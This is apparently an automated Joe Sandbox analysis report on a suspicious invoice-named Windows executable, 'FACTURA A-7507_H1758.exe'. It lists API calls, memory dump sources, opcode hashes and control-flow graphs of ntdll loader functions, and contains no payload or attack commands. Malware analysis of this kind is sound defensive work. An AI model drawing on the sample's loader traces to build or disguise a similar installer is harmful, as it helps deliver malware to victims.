                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp
                                                                                                                                                                                                                          • API String ID: 2962429428-1435105410
                                                                                                                                                                                                                          • Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                                                                                                                                                                                          • Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$1033
                                                                                                                                                                                                                          • API String ID: 530164218-1283775540
                                                                                                                                                                                                                          • Opcode ID: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                                                                                                                                                                                          • Instruction ID: 4786a0dcc4ba2f930af81554b1ec9cb86176e7a1d2ad565e9f211a7c6dcc4e6b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7111C331B44210ABD7359F15EC40A337B6CEF85715B28427BE801AB3A1C63A9D1296A9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405B84
                                                                                                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405B94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                          • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                                                                                          • Instruction ID: 87bbc210c64b19a6b78a00595756172ded5dec919d443e3f73ce50da7c0279be
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4D05EB24009209AD312AB04DD00DAF77ACEF163007464426E841AB166D778BC8186BC
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                                                                                                                                                                          • Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:0%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:100%
                                                                                                                                                                                                                          Total number of Nodes:1
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 72967 35472b90 LdrInitializeThunk

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 2 354734e0-354734ec LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ef2ce8c260cfedfcde983537d5cfe94f7b439375844fa834935f2b3c2dfcbe34
                                                                                                                                                                                                                          • Instruction ID: 00febf1a2ddbc7f05cfb8202ddf8b0fe02c80639f257e412af445f71e52e99d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef2ce8c260cfedfcde983537d5cfe94f7b439375844fa834935f2b3c2dfcbe34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D990023160510442D50462584614706201547D1201FA1CC56A0414528DC7A6895575A2

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1 35472d10-35472d1c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: eca7398f017d1bd1d47a4d6701e8560cd29cf485d015c400c4a2b4e659891515
                                                                                                                                                                                                                          • Instruction ID: 7b7174cf9d950fa00f3d8632825ff275a21e33fcf48cb3f452c4f1cead6e940e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eca7398f017d1bd1d47a4d6701e8560cd29cf485d015c400c4a2b4e659891515
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F090023120100453D51562584604707101947D1241FD1CC57A0414518DD6678956B121

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 35472b90-35472b9c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e8417fb806954cb4136a7a6b47f154f0355d25ba3f197098ead864e63d2b8122
                                                                                                                                                                                                                          • Instruction ID: 00fa9a03536d2b1dca2925ce2ce38e561272ce60b4f64c47e95835daadc6342d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8417fb806954cb4136a7a6b47f154f0355d25ba3f197098ead864e63d2b8122
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9790023120108842D5146258850474A101547D1301F95CC56A4414618DC6A688957121
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                                                                                          • Opcode ID: 5108e54571763549f83eac1797b4d06e5884715fcacda53eb1cff3f0385b348f
                                                                                                                                                                                                                          • Instruction ID: 49d57d3bbc6e097df388a2264a5aea0b3bf0e3b6754eab426b2b14c333af4d20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5108e54571763549f83eac1797b4d06e5884715fcacda53eb1cff3f0385b348f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B928DB560C341ABEB29CF20C880F5BB7E9BB84750F40495DFA95D7250DBB0E945CBA2

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 554 354d9060-354d90a9 555 354d90f8-354d9107 554->555 556 354d90ab-354d90b0 554->556 557 354d9109-354d910e 555->557 558 354d90b4-354d90ba 555->558 556->558 559 354d9893-354d98a7 call 35474b50 557->559 560 354d9215-354d923d call 35478f40 558->560 561 354d90c0-354d90e4 call 35478f40 558->561 570 354d925c-354d9292 560->570 571 354d923f-354d925a call 354d98aa 560->571 568 354d90e6-354d90f3 call 354f92ab 561->568 569 354d9113-354d91b4 GetPEB call 354dd7e5 561->569 580 354d91fd-354d9210 RtlDebugPrintTimes 568->580 581 354d91b6-354d91c4 569->581 582 354d91d2-354d91e7 569->582 575 354d9294-354d9296 570->575 571->575 575->559 579 354d929c-354d92b1 RtlDebugPrintTimes 575->579 579->559 589 354d92b7-354d92be 579->589 580->559 581->582 583 354d91c6-354d91cb 581->583 582->580 584 354d91e9-354d91ee 582->584 583->582 587 354d91f0 584->587 588 354d91f3-354d91f6 584->588 587->588 588->580 589->559 590 354d92c4-354d92df 589->590 591 354d92e3-354d92f4 call 354da388 590->591 594 354d92fa-354d92fc 591->594 595 354d9891 591->595 594->559 596 354d9302-354d9309 594->596 595->559 597 354d947c-354d9482 596->597 598 354d930f-354d9314 596->598 601 354d961c-354d9622 597->601 602 354d9488-354d94b7 call 35478f40 597->602 599 354d933c 598->599 600 354d9316-354d931c 598->600 607 354d9340-354d9391 call 35478f40 RtlDebugPrintTimes 599->607 600->599 606 354d931e-354d9332 600->606 604 354d9674-354d9679 601->604 605 354d9624-354d962d 601->605 615 354d94b9-354d94c4 602->615 616 354d94f0-354d9505 602->616 610 354d967f-354d9687 604->610 611 354d9728-354d9731 604->611 605->591 609 354d9633-354d966f call 35478f40 605->609 612 354d9338-354d933a 606->612 613 354d9334-354d9336 606->613 607->559 640 354d9397-354d939b 607->640 633 354d9869 609->633 619 354d9689-354d968d 610->619 620 354d9693-354d96bd call 354d8093 610->620 611->591 617 354d9737-354d973a 611->617 612->607 613->607 622 354d94cf-354d94ee 615->622 623 354d94c6-354d94cd 615->623 627 354d9507-354d9509 616->627 628 354d9511-354d9518 616->628 624 354d97fd-354d9834 call 35478f40 617->624 625 354d9740-354d978a 617->625 619->611 619->620 646 354d9888-354d988c 620->646 647 354d96c3-354d971e call 35478f40 RtlDebugPrintTimes 620->647 632 354d9559-354d9576 RtlDebugPrintTimes 622->632 623->622 658 354d983b-354d9842 624->658 659 354d9836 624->659 630 354d978c 625->630 631 354d9791-354d979e 625->631 634 354d950f 627->634 635 354d950b-354d950d 627->635 636 354d953d-354d953f 628->636 630->631 643 354d97aa-354d97ad 631->643 644 354d97a0-354d97a3 631->644 632->559 663 354d957c-354d959f call 35478f40 632->663 645 354d986d 633->645 634->628 635->628 641 354d951a-354d9524 636->641 642 354d9541-354d9557 636->642 649 354d939d-354d93a5 640->649 650 354d93eb-354d9400 640->650 655 354d952d 641->655 656 354d9526 641->656 642->632 653 354d97af-354d97b2 643->653 654 354d97b9-354d97fb 643->654 644->643 652 354d9871-354d9886 RtlDebugPrintTimes 645->652 646->591 647->559 683 354d9724 647->683 660 354d93a7-354d93d0 call 354d8093 649->660 661 354d93d2-354d93e9 649->661 662 354d9406-354d9414 650->662 652->559 652->646 653->654 654->652 666 354d952f-354d9531 655->666 656->642 664 354d9528-354d952b 656->664 667 354d984d 658->667 668 354d9844-354d984b 658->668 659->658 671 354d9418-354d946f call 35478f40 RtlDebugPrintTimes 660->671 661->662 662->671 686 354d95bd-354d95d8 663->686 687 354d95a1-354d95bb 663->687 664->666 674 354d953b 666->674 675 354d9533-354d9535 666->675 669 354d9851-354d9857 667->669 668->669 677 354d985e-354d9864 669->677 678 354d9859-354d985c 669->678 671->559 690 354d9475-354d9477 671->690 674->636 675->674 676 354d9537-354d9539 675->676 676->636 677->645 684 354d9866 677->684 678->633 683->611 684->633 688 354d95dd-354d960b RtlDebugPrintTimes 686->688 687->688 688->559 692 354d9611-354d9617 688->692 690->646 692->617
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $ $0
                                                                                                                                                                                                                          • API String ID: 3446177414-3352262554
                                                                                                                                                                                                                          • Opcode ID: 1c964a6d16f20add045201aa388390012ee096396360534a85246f3fc431f7a8
                                                                                                                                                                                                                          • Instruction ID: 7d2dde6f9d2b517496420582784908ed1703d79c3ffeb04ee7e10172ae7f1522
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c964a6d16f20add045201aa388390012ee096396360534a85246f3fc431f7a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 583200B16083818FE354CF68C894B9AFBF5BB88744F00492EF999C7352D774E9498B52

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 881 354dfdf4-354dfe16 call 35487be4 884 354dfe18-354dfe30 RtlDebugPrintTimes 881->884 885 354dfe35-354dfe4d call 35427662 881->885 891 354e02d1-354e02e0 884->891 889 354e0277 885->889 890 354dfe53-354dfe69 885->890 894 354e027a-354e02ce call 354e02e6 889->894 892 354dfe6b-354dfe6e 890->892 893 354dfe70-354dfe72 890->893 895 354dfe73-354dfe8a 892->895 893->895 894->891 897 354dfe90-354dfe93 895->897 898 354e0231-354e023a GetPEB 895->898 897->898 902 354dfe99-354dfea2 897->902 900 354e023c-354e0257 GetPEB call 3542b910 898->900 901 354e0259-354e025e call 3542b910 898->901 909 354e0263-354e0274 call 3542b910 900->909 901->909 906 354dfebe-354dfed1 call 354e0835 902->906 907 354dfea4-354dfebb call 3543fed0 902->907 916 354dfedc-354dfef0 call 3542753f 906->916 917 354dfed3-354dfeda 906->917 907->906 909->889 920 354dfef6-354dff02 GetPEB 916->920 921 354e0122-354e0127 916->921 917->916 922 354dff04-354dff07 920->922 923 354dff70-354dff7b 920->923 921->894 924 354e012d-354e0139 GetPEB 921->924 925 354dff09-354dff24 GetPEB call 3542b910 922->925 926 354dff26-354dff2b call 3542b910 922->926 929 354e0068-354e007a call 35442710 923->929 930 354dff81-354dff88 923->930 927 354e013b-354e013e 924->927 928 354e01a7-354e01b2 924->928 943 354dff30-354dff51 call 3542b910 GetPEB 925->943 926->943 933 354e015d-354e0162 call 3542b910 927->933 934 354e0140-354e015b GetPEB call 3542b910 927->934 928->894 931 354e01b8-354e01c3 928->931 953 354e0110-354e011d call 354e0d24 call 354e0835 929->953 954 354e0080-354e0087 929->954 930->929 937 354dff8e-354dff97 930->937 931->894 940 354e01c9-354e01d4 931->940 952 354e0167-354e017b call 3542b910 933->952 934->952 938 354dff99-354dffa9 937->938 939 354dffb8-354dffbc 937->939 938->939 946 354dffab-354dffb5 call 354ed646 938->946 948 354dffce-354dffd4 939->948 949 354dffbe-354dffcc call 35463ae9 939->949 940->894 947 354e01da-354e01e3 GetPEB 940->947 943->929 974 354dff57-354dff6b 943->974 946->939 957 354e01e5-354e0200 GetPEB call 3542b910 947->957 958 354e0202-354e0207 call 3542b910 947->958 960 354dffd7-354dffe0 948->960 949->960 984 354e017e-354e0188 GetPEB 952->984 953->921 963 354e0089-354e0090 954->963 964 354e0092-354e009a 954->964 981 354e020c-354e022c call 354d823a call 3542b910 957->981 958->981 972 354dfff2-354dfff5 960->972 973 354dffe2-354dfff0 960->973 963->964 965 354e009c-354e00ac 964->965 966 354e00b8-354e00bc 964->966 965->966 976 354e00ae-354e00b3 call 354ed646 965->976 978 354e00be-354e00d1 call 35463ae9 966->978 979 354e00ec-354e00f2 966->979 982 354dfff7-354dfffe 972->982 983 354e0065 972->983 973->972 974->929 976->966 995 354e00e3 978->995 996 354e00d3-354e00e1 call 3545fdb9 978->996 990 354e00f5-354e00fc 979->990 981->984 982->983 989 354e0000-354e000b 982->989 983->929 984->894 985 354e018e-354e01a2 984->985 985->894 989->983 993 354e000d-354e0016 GetPEB 989->993 990->953 994 354e00fe-354e010e 990->994 998 354e0018-354e0033 GetPEB call 3542b910 993->998 999 354e0035-354e003a call 3542b910 993->999 994->953 1003 354e00e6-354e00ea 995->1003 996->1003 1006 354e003f-354e005d call 354d823a call 3542b910 998->1006 999->1006 1003->990 1006->983
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
